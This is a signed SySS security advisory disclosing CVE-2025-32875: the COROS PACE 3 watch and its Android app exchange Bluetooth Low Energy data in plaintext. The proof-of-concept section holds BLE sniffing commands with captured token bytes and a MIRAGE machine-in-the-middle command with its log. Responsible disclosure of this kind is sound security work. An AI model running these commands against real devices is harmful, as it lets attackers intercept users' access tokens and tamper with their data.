-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2025-025 Product: COROS PACE 3 / COROS Android application Manufacturer: COROS Wearables, Inc. Affected Version(s): <= V 3.8.12 Tested Version(s): V 3.8.12 Vulnerability Type: Cleartext Transmission of Sensitive Information (CWE-319) Risk Level: High Solution Status: Not yet fixed Manufacturer Notification: 2025-03-14 Solution Date: N.A. Public Disclosure: 2025-06-17 CVE Reference: CVE-2025-32875 Author of Advisory: Moritz Abrell, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: The COROS PACE 3 is a professional GPS sport smart watch. The manufacturer describes the product as follows (see [1]): "Improving on its legendary predecessor in every way, PACE 3 packs an even more powerful punch. Track your training and recovery with a watch that's lightweight and comfortable, with advanced technology, outstanding data accuracy, and backed by the industry-leading COROS training software system. The COROS PACE 3 paves the way to discover your potential." Due to the lack of Bluetooth pairing and bonding in the COROS Android application[4], an attacker within Bluetooth range can eavesdrop on, extract, and in active setups manipulate sensitive data transmitted over Bluetooth Low Energy (BLE). ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: When using the COROS Android application, Bluetooth pairing and bonding is neither initiated nor enforced by the application itself. Also, the watch does not enforce pairing and bonding. As a result, any data transmitted via BLE remains unencrypted, allowing attackers within Bluetooth range to eavesdrop on the communication. Furthermore, even if a user manually initiates pairing and bonding in the Android settings, the application continues to transmit data without requiring the watch to be bonded. This fallback behavior enables attackers to exploit the communication, for example, by conducting an active machine-in-the-middle attack. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): By using tools and frameworks such as MIRAGE[5], WHAD[6] or Sniffle[7], the BLE communication can be sniffed. The following example shows the captured API access token, transmitted by the app to the COROS PACE 3 in plaintext: $ wsniff -i uart0 -o sniffed-ble.pcap --format=hexdump --follow-connection [...] <<< Data PDU 00000000: 02 5C 58 00 04 00 52 19 00 B2 00 02 00 20 41 57 .\X...R...... AW 00000010: 39 52 4E [redacted] 9RN [redacted] 00000020: 46 54 50 46 4E 34 37 52 47 4B 37 58 4B 4A 05 65 FTPFN47RGK7XKJ.e 00000030: 6E 2D 55 53 00 27 30 3D 63 6F 72 6F 73 2E 63 6F n-US.'0=coros.co 00000040: 6D 26 31 3D 61 70 69 65 75 26 32 3D 65 70 6F 65 m&1=apieu&2=epoe 00000050: 75 26 33 3D 6D 61 70 73 74 61 74 69 63 B2 u&3=mapstatic. [...] Even if the COROS PACE 3 is bonded in the Android settings, the communication can be forced to fallback to plaintext in an active machine-in-the-middle setup: $ mirage ble_mitm TARGET=F7:AF:1D:27:03:b0 [INFO] Module ble_mitm loaded ! [SUCCESS] HCI Device (hci0) successfully instanciated ! [SUCCESS] HCI Device (hci1) successfully instanciated ! [INFO] Entering SCAN stage ... [SUCCESS] Found corresponding advertisement ! [INFO] Entering CLONE stage ... [INFO] Connecting to slave F7:AF:1D:27:03:B0... [INFO] Updating connection handle : 2048 [SUCCESS] Connected on slave : F7:AF:1D:27:03:B0 [INFO] Entering WAIT_CONNECTION stage ... [INFO] Updating connection handle : 68 [SUCCESS] Master connected : 7B:60:71:9A:2C:4B [INFO] Slave disconnected ! [INFO] Changing HCI Device (hci0) Random Address to : 7B:60:71:9A:2C:4B [SUCCESS] BD Address successfully modified ! [INFO] Connecting to slave F7:AF:1D:27:03:B0... [INFO] Updating connection handle : 2048 [INFO] Entering ACTIVE_MITM stage ... [INFO] Read By Group Type Request (from master) : startHandle = 0x1 / endHandle = 0xffff / uuid = 0x2800 [INFO] Redirecting to slave ... [INFO] Long Term Key Request (from master) : ediv = 0x1688 / rand = e9d6735c39cead61 [INFO] No LTK provided, encryption not enabled. [INFO] Read By Group Type Response (from slave) : length = 6 / data = 01000500001806000600011807000a000f18 [...] Afterwards, the Android app keeps communicating via BLE in plaintext. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Not yet fixed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2025-03-10: Vulnerability discovered 2025-03-14: Vulnerability reported to manufacturer 2025-03-14: Confirmation of receipt received 2025-03-17: Asked the manufacturer for an update 2025-03-31: More information provided to the manufacturer 2025-04-07: Asked the manufacturer for an update 2025-04-14: Informed the manufacturer about the assigned CVE-ID and asked for an update once again 2025-04-15: Answer received from the manufacturer; manufacturer informed SySS GmbH that a fix for the vulnerability is planned for the end of the year (2025) 2025-04-15: Receipt confirmed, and the issue was clarified once more, along with a recommendation for prompt resolution 2025-06-17: Public disclosure ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] COROS PACE 3 product website https://eu.coros.com/pace3 [2] SySS Security Advisory SYSS-2025-025 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-025.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy [4] COROS Android application https://play.google.com/store/apps/details?id=com.yf.smart.coros.dist [5] MIRAGE GitHub repository: https://github.com/RCayre/mirage [6] WHAD GitHub repository: https://github.com/whad-team/whad-client [7] Sniffle GitHub repository: https://github.com/nccgroup/Sniffle [8] CVE-2025-32875 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-32875 [9] Detailed blog post: https://blog.syss.com/posts/bluetooth-analysis-coros-pace-3/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Moritz Abrell of SySS GmbH. E-Mail: moritz.abrell@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmhQEc0ACgkQrgyb+PE0 i1N97hAAhImrzph0e1Ub93qOjvxnAAMBW/yjvDqBRUpdR/uBWPIhTtbV3B9ZIfDR irwXaRWpr8eLXXniC5d9uZeX6dyqCMQpyZJ7hpugu+NpjI8o+I2cJLvRItaDpufj RfDvrUEW8Or3sSkID2reWGci/WAlud7YIFD8vaHBbcptJP5uUN7RHbk5TM7AM/Dc 8GQKeB2+aonzWcdUkfv8SCAXYwUmBueDOBNvFyUwuCm8p1Dea5b4aUmOnLKKW/HD g9yCY7MpENiGM3ToiIJ+2lJFGrcpgiY1YCtb4o8KU45CLkteU31PHDcKkZUg4vdG vKpueMbaiqI/0LEUdAoYJFaYbGeRoe1zbEE8Oy2J6Sx2kvgZKWxgruCGtkN+fKe0 zYSuk5CnBc1ssBpsLgJ3Lw42cuwFWyjnDFCrP7Sq0XSpNyaA4gIEWYCMw92//rk1 XIeJFRCG1AXEuwavn8eJMu3qQR23LmIbMicmXro/Kb2GuHG200g8o+6394O25+JP L6tcGGKZXlY1anrAFUQX5Ol8XcY3EOCKSxY1e/61WmiwS+fefVMJky+yvOhJYAMs ezvmTObgOjZn7aYkmjfqGtGjGhmovYOEYxvMVBDFaStvVQ3g1i6CMP2/IQ9ds7AK mvmdXtH7nCXhfyNm4BiIYRFkcYVq1lyu2V0vcCxfSLq2jZI0E2c= =AE0i -----END PGP SIGNATURE-----